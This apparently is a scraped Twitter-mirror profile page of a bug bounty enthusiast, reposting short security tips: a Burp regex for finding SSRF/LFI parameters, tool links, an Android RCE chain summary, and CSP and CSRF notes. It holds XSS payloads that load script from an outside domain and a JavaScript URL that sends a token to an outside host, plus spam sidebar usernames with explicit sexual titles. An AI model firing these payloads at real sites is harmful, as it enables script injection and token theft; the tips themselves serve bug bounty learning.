![0x0SojalSec's tweet photo. Quick and dirty way to find parameters vulnerable to LFI & Path Traversal & SSRF & Open Redirect:
Burp Search > Regex
\?.*=(\/\/?\w+|\w+\/|\w+(%3A|:)(\/|%2F)|%2F|[\.\w]+\.\w{2,4}[^\w])
And find potentially vulnerable SSRF params
- https://t.co/6cfBPVn0FM
#SSRF #cybersec https://t.co/ipnHHHaID4](https://pbs.twimg.com/media/GhHCu55bIAAv5R-.png)
Olivia
Online
Jesus Bermudez
@jesuser14
Programming of Software
IT Security Enthusiast
Bounty Hunter Apprentice
Manhattan, NY
Joined January 2015
368 Following
31 Followers
2.2K Posts
New Android interception tool for component communication (IPC) mapping called #noxen for pentesters and bug bounty hunters
Run an Android emulator
inside Docker.
Lightweight.
Customizable.
Open-source.
https://t.co/hQP7hlXB1c
🔬 FRIDA for Bypassing Anti-Debug
🐍 This tutorial shows you how to use Dynamic Binary Instrumentation (DBI) and the Interceptor.attach method to defeat common anti-debugging features in Windows binaries.
👉 https://t.co/4zvrmLkPXB
How to build Android Bug Bounty lab
Guide to configuring emulators, real devices, proxies, Magisk, Burp, Frida by @yeswehack
https://t.co/f3Iez8PKI0
A smarter web fuzzing tool that combines local LLM models and ffuf to optimize directory and file discovery
https://t.co/giFsVKq03w
Made some really cool @n8n_io automation for Bug Bounty hunters with @ethicxlhuman 👇 https://t.co/r5JTHirknV
Under project "The Sword" I present:
🛠️ etxNuclei Template Generator
Submit CVE + POC → AI generates YAML → validated → uploaded to Slack
Converts exploits to scan templates in seconds. No manual YAML writing.
https://t.co/FkrFlyNCD1
#bugbounty #n8n
A DNS takeover is not the same as a subdomain takeover.
DNS takeovers have become a popular but often misunderstood vulnerability.
In this blog, you will learn:
✅ The difference between a DNS and subdomain takeover: A subdomain takeover exploits a service a domain points to, while a DNS takeover gives the attacker full control over the DNS server itself, which is more severe.
✅ How to spot a vulnerable domain: Learn the two key criteria for detecting a DNS takeover, including looking for a SERVFAIL or REFUSED status and identifying a domain's authoritative nameservers.
✅ How to take control of a domain: The blog walks you through the process, from finding vulnerable DNS providers to the steps needed to claim a domain.
✅ Automated Detection: Discover how to use tools like Nuclei with specific templates to automate the detection of domains that are potentially vulnerable to a DNS takeover.
Want to master DNS takeovers and learn how to defend against them?
Read the full article for a complete guide.👇
https://t.co/t68sgAyiaU
Solution: javascript://httpbin.org/%0afetch('https://x.com/#');
When the Query is being added to the URL, it will look like: javascript://httpbin.org/%0afetch('https://x. com?token=SEC#');
The trick is using fragment (#) to ensure closing the function call
Android TikTok RCE
From WebView XSS to native lib overwrite via Zip Slip led to full RCE:
1. Universal XSS
2. JavaScript bridge → open internal deep-link
3. Launch protected activity
4. Split APK
5. Zip Slip → overwrite native lib
6. App restart → RCE
https://t.co/VQPTPejaw9
Found an XSS but got blocked by the CSP?
https://t.co/0aA3GyIOVz has a compiled list of ways to bypass the Content-Security Policy. Check out the video below 👇
If you see android:exported="true" in AndroidManifest.xml in Android pentests, you should definitely try the intent injection method, this may give you ssrf, exfiltration sensitive data, rce. 🥰🌹🥳
#BugBounty #bugbountytips
@tec_sany I can see the edit picture....
How I Automated My Bug Bounty Recon with n8n (No Coding Required)
https://t.co/RQxYxSjF58
#bugbounty #bugbountytips #bugbountytip
Sometimes people think they've found HTTP request smuggling, when they're actually just observing HTTP keep-alive or pipelining. This is usually a false positive, but sometimes there's actually a real issue there! Learn how to tell the two apart:
https://t.co/K8BqcVxu5A
HTML Injection That Paid $3K
Main issue: most websites only rely on SameSite cookies for CSRF protection.
No XSS? No problem.
HTML Injection + <form> can still trigger sensitive actions.
Hope this helps!
Honorable mention to my bug bounty partner @fariqfgi 🙌
I received a lot of DMs, Mentions and Comments as to why I left Bug-Bounty, where did I vanish, when would I continue with my 100k challenge and so on.
So here is the answer.
I have joined @Meta — London, UK as a Product Security Engineer which I still can't believe just happened.
I was extremely busy with the interview preparation, the interview itself and Visa Requirements afterwards for this huge change in my life.
I am extremely grateful for this opportunity and ready for the challenges ahead. Here’s to new beginnings!
Regarding bug-bounty, I will soon resume on the 100k challenge, but this time, with more energy, power, focus determination and hardwork.
#Meta #SecurityEngineer #DreamJob
Improve your #XSS PoCs w/ a remote call to our https://t.co/sPexUkaZik domain!
➡️ Replacing alert(1)
'-import('//X55.is')-'
<Svg OnLoad=import('//X55.is')>
➡️ As href/src attribute
<Base Href=//X55.is>
<Script Src=//X55.is>
➡️ Jumping to # for custom JS
https://t.co/qNOQia4Bxu
📌Active Directory OSCP Edition
🔗https://t.co/aFDFwmb3ef
Last Seen Users on Sotwe
Olgun Kürt İzmir 
Seen from Turkey
🌸 Sex Live Cam 🌸
Seen from Turkey
XXX Milf porn pussy 💝
xxxssxxx
Seen from Turkey
みーれーい
Seen from United States
Tecavüz Porno İzle- Zorla Porno İzle
Seen from Turkey
Leonel Flores Asensio
Seen from Indonesia
𝑳𝝁𝒔𝝉 𝑺𝝉𝜽𝜸𝒊𝜺𝒔
Seen from Egypt
𝖉𝖗.єzhuzz ⚕️😈
Seen from India
cuckold bbc karısını paylaşanlar
Seen from Turkey
Trends for you
Most Popular Users
Elon Musk
@elonmusk
240.2M followers
Barack Obama
@barackobama
119.3M followers
Donald J. Trump
@realdonaldtrump
111.6M followers
Cristiano Ronaldo
@cristiano
109.5M followers
Narendra Modi
@narendramodi
106.9M followers
Rihanna
@rihanna
97.4M followers
NASA
@nasa
92.1M followers
Justin Bieber
@justinbieber
90.7M followers
KATY PERRY
@katyperry
87.1M followers
Taylor Swift
@taylorswift13
80.9M followers
Lady Gaga
@ladygaga
72.5M followers
Kim Kardashian
@kimkardashian
69.5M followers
Virat Kohli
@imvkohli
69M followers
YouTube
@youtube
68.6M followers
Bill Gates
@billgates
63.5M followers
The Ellen Show
@theellenshow
62.5M followers
CNN
@cnn
61.9M followers
Neymar Jr
@neymarjr
61.6M followers
X
@x
60.9M followers
Selena Gomez
@selenagomez
60.2M followers